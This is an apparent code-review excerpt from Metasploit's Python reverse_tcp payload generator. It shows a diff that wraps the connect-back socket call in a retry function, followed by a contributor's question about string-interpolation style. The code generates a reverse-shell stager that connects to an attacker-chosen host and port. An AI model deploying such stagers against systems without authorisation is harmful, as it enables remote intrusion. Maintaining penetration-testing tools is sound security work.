lib/msf/core/payload/python/reverse_tcp.rb

```diff
@@ -44,14 +45,22 @@ def transport_config(opts={})
   def generate_reverse_tcp(opts={})
     # Set up the socket
     cmd  = "import socket,struct\n"
-    cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
-    cmd << "s.connect(('#{opts[:host]}',#{opts[:port]}))\n"
+    cmd << "import time\n"
+    cmd << "def connect():\n"
+    cmd << "\ttry:\n"
+    cmd << "\t\ts=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
+    cmd << "\t\ts.connect(('#{opts[:host]}',#{opts[:port]}))\n"
     cmd << py_send_uuid if include_send_uuid
```

Comment:
The original `reverse_tcp` file also had the same kind of formatting that I used, So I decided to stick to it. Should I change that by using `Q` for interpolation. @timwr